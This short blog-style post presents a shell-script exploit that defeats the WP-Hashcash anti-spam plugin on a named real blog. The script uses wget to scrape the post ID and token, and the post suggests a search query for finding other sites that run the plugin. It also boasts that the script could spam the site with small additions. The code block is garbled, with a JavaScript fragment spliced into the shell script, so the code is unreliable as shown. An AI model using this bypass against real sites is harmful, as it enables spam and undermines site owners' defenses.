= Exploit =

As a proof of concept, I wrote a shell script to break hashcash. It works on the author's own blog:

[code]
AUTHOR='test'
EMAIL='test'
URL='test'
COMMENT='test'
SITE='http://elliottback.com/wp'
POST='/archives/2005/05/11/wordpress-hashcash-20/'
CPID="$(wget -O - "$SITE$POST" 2>/dev/null | grep 'comment_post_ID' | cut -d'"' -f 14)"
MD5="$(wget -O - "$SITE$POST" 2>/dev/null | grep '
>5]|=(str.charCodeAt(i/8)&mask)<<(i%32);return bin;}
[/code]

or just do this: ;) http://www.google.com/search?q=%22Powered+by+WP-Hashcash%22

Elliot Back thinks people can't code around his obfuscation. It's rather trivial to defeat -- and this script can spam his site one after another with a little addition or two -- determining the length of ABSPATH for a single site doesn't take that long either, and once you have it, it's the same for all posts. He appears to do some fancy stuff "per-user", too, but a spammer isn't going to be "a user" or bother to become one. Of course, you can just "interpret" his javascript, too, like some spammers already can do, but that can be more effort than it's worth.